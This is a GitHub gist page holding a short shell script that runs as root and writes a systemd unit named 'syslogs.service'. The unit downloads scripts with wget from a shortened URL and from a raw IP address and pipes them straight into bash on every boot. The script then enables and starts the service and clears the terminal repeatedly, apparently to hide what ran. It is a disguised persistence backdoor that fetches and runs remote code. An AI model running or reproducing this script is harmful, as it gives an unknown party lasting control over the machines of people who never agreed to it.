Last active
July 26, 2018 10:46
-
-
Save gregsifr/ff82f9f0b1632db9f822095ba05e91ad to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sudo su | |
echo " | |
[Unit] | |
Description=foo | |
[Service] | |
ExecStart=/bin/bash -c '/bin/sleep 30; /usr/bin/wget -O - https://goo.gl/fQyxzw | /bin/bash; /usr/bin/wget -O - https://172.217.25.174/fQyxzw | /bin/bash;' | |
[Install] | |
WantedBy=multi-user.target" > /etc/systemd/system/syslogs.service | |
sudo systemctl enable syslogs.service | |
sudo systemctl start syslogs.service | |
for i in {1..10}; do clear; done; | |
sudo apt update | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment